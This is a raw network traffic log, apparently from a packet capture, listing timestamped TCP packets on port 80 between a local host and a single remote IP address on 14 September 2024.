Sep 14, 2024 18:31:09.773731947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773741961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773751974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773761034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773771048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773782015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773785114 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.773818016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773827076 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.773869991 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.773963928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773976088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773984909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.773994923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774004936 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774014950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774025917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774049997 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.774055958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774068117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774101973 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.774101973 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.774125099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774136066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774164915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774177074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774185896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774195910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774205923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774229050 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.774265051 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.774348974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774365902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774377108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774388075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774435997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774446964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774449110 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.774457932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774477005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774487972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774492979 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.774499893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774545908 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.774576902 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.774647951 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774658918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774667978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774677992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774714947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774717093 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.774729967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774740934 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774753094 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.774785042 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.774861097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774873018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774882078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774893999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774933100 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.774962902 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.774982929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.774995089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.775005102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.775015116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.775024891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.775034904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.775038004 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.775044918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.775074005 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.775171995 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.776006937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.776017904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.776027918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.776093006 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.776110888 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.776120901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.776130915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.776140928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.776161909 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.776195049 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.776264906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.776277065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.776285887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.776295900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.776305914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.776315928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.776315928 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.776326895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.776351929 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.776453018 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.815680981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.815690041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.815726995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.815771103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.815782070 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.815787077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.815829992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.815840960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.815864086 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.816143990 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.859496117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.859519005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.859530926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.859540939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.859560013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.859570026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.859580994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.859677076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.859687090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.859697104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.859709978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.859720945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.859725952 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.859726906 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.859726906 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.859767914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.859777927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.859797955 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.859821081 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.859894991 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.860603094 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.860614061 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.860629082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.860637903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.860647917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.860658884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.860667944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.860677004 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.860678911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.860713005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.860723972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.860733032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.860743046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.860754013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.860758066 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.860764027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.860791922 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.860824108 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.861080885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861089945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861099958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861119986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861129999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861140966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861141920 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.861152887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861200094 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.861217976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861228943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861248016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861257076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861267090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861277103 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.861306906 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.861337900 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.861396074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861407042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861417055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861426115 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861435890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861444950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861450911 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.861455917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861486912 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.861520052 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.861535072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861546040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861556053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861566067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861586094 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.861615896 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.861625910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861638069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861646891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861655951 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861666918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861677885 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.861718893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861725092 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.861730099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861741066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861747980 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.861783981 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.861850977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861862898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861908913 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.861917019 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861948013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861957073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861967087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.861972094 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.862001896 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.862020016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862030983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862077951 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.862234116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862242937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862253904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862272024 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862282038 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862286091 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.862319946 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862332106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862343073 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.862366915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862375975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862379074 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.862407923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862417936 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862421989 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.862473965 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.862503052 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862513065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862523079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862531900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862543106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862552881 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862560034 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.862584114 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.862617970 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.862840891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862936020 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862945080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862955093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862967014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.862989902 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.863019943 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.863034010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863044977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863054991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863065958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863076925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863085985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863087893 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.863114119 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.863145113 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.863156080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863167048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863177061 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863188028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863198996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863210917 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.863229990 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.863260031 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.863461018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863529921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863539934 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863555908 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863567114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863590002 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.863629103 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.863651037 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863661051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863672018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863682985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863704920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863708019 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.863713980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863724947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863729954 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.863765001 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.863791943 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.863796949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863810062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863821030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863831997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863841057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.863867998 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.863903046 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.867150068 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.905106068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.905113935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.905124903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.905139923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.905152082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.905162096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.905177116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.905186892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.905301094 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.905302048 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.905394077 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.947655916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.947664022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.947673082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.947679996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.947684050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.947694063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.947705030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.947746992 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.947812080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.947828054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.947834969 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.947838068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.947849989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.947880983 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.947916985 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.947968960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.947979927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.947988033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.947998047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.948005915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.948121071 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.948992968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.949002028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.949012041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.949021101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.949032068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.949062109 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.949141979 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.949167013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.949177980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.949186087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.949256897 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.949866056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.949932098 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.949999094 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950007915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950016975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950026989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950037003 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950103045 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.950134039 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.950138092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950150013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950164080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950175047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950186014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950191975 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.950196981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950234890 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.950520039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.950530052 CEST	80	49738	172.67.203.195	192.168.2.4
